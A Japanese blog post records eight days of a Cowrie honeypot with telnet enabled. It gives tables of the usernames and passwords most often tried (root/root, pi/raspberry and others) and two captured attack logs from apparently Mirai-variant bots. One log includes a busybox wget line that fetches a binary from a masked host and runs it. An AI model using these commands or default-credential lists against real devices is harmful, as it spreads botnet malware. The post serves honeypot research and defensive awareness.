ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察日記【5】

Cowrie運用8日目の簡易調査報告です。
2日連続でブログを更新することはまずないのですが、
telnet接続を許可したらアタックが増えたため、
備忘録としても書いておこうかなと。
※今までtelnet接続を許可していなかったのは、なんとなくです。

ダッシュボードと集計結果

ダッシュボード
※集計期間:2018/08/12~2018/08/19
f:id:SugitaMuchi:20180819134608p:plainf:id:SugitaMuchi:20180819134612p:plain


■ログイン試行回数( username )
※集計期間:2018/08/12~2018/08/19
※上位10件

試行回数 username
175 root
48 pi
47 admin
31 shell\u0000
31 enable\u0000
27 default
6 user
6 telnet
6 \u0015\b\b\u0013
5 support

■ログイン試行回数( password )
※集計期間:2018/08/12~2018/08/19
※上位10件

試行回数 password
44 root
31 system\u0000
31 sh\u0000
24 raspberryraspberry993311
24 raspberry
21 admin
17 (non pass)
13 root1234
12 vizxv
10 OxhlwSG8

■ログイン試行回数( username / password )
※集計期間:2018/08/12~2018/08/19
※上位10件

試行回数 username / password
44 root / root
31 shell\u0000 / sh\u0000
31 enable\u0000 / system\u0000
24 pi / raspberryraspberry993311
24 pi / raspberry
19 admin / admin
13 root / root1234
12 root / vizxv
10 default / OxhlwSG8
10 default / (non pass)

当たり前のことですが、root / rootadmin / adminなど、
簡単に推測できそうなユーザ名やパスワードは避けたほうがよさそうですね。

そのほか

ダウンロードファイルなども増えてはいるのですが、時間的に書ききれないため、
ログを読んでいて気になった部分について。

■Mirai亜種?による攻撃を観測
telnet接続を許可したことによって、以下のようなログが増えました。
※ XXXXXはランダムな値です
IPアドレスやポート番号はマスキングしています

[コマンド実行ログ_1]

enable
system
shell
sh
/tmp/.ptmx && cd /tmp/
/var/.ptmx && cd /var/
/dev/.ptmx && cd /dev/
/mnt/.ptmx && cd /mnt/
/var/run/.ptmx && cd /var/run/
/var/tmp/.ptmx && cd /var/tmp/
/.ptmx && cd /
/dev/netslink/.ptmx && cd /dev/netslink/
/dev/shm/.ptmx && cd /dev/shm/
/bin/.ptmx && cd /bin/
/etc/.ptmx && cd /etc/
/boot/.ptmx && cd /boot/
/usr/.ptmx && cd /usr/
/bin/busybox rm -rf mioribitches XXXXX
/bin/busybox cp /bin/busybox mioribitches; >mioribitches; /bin/busybox chmod 777 mioribitches; /bin/busybox XXXXX
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox XXXXX
/bin/busybox wget; /bin/busybox tftp; /bin/busybox XXXXX
/bin/busybox wget hxxp://xx.xx.xx.xx:xx/miori.x86 -O - > mioribitches; /bin/busybox chmod 777 mioribitches; /bin/busybox XXXXX
./mioribitches telnet.x86.wget; /bin/busybox XXXXX
/bin/busybox rm -rf mioridlr; >mioribitches; /bin/busybox XXXXX

[コマンド実行ログ_2]

enable
system
shell
sh
cat /proc/mounts; /bin/busybox XXXXX
cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox XXXXX
tftp; wget; /bin/busybox XXXXX
dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
/bin/busybox XXXXX
rm .s; exit

これら以外にも、5分~10分に1度の頻度でユニークなIPアドレスから
異なるパターンのアタックログを複数確認しました。

以上。


■参考 blog.trendmicro.co.jp

www.exploit-db.com

JVNDB-2017-006833 - JVN iPedia - 脆弱性対策情報データベース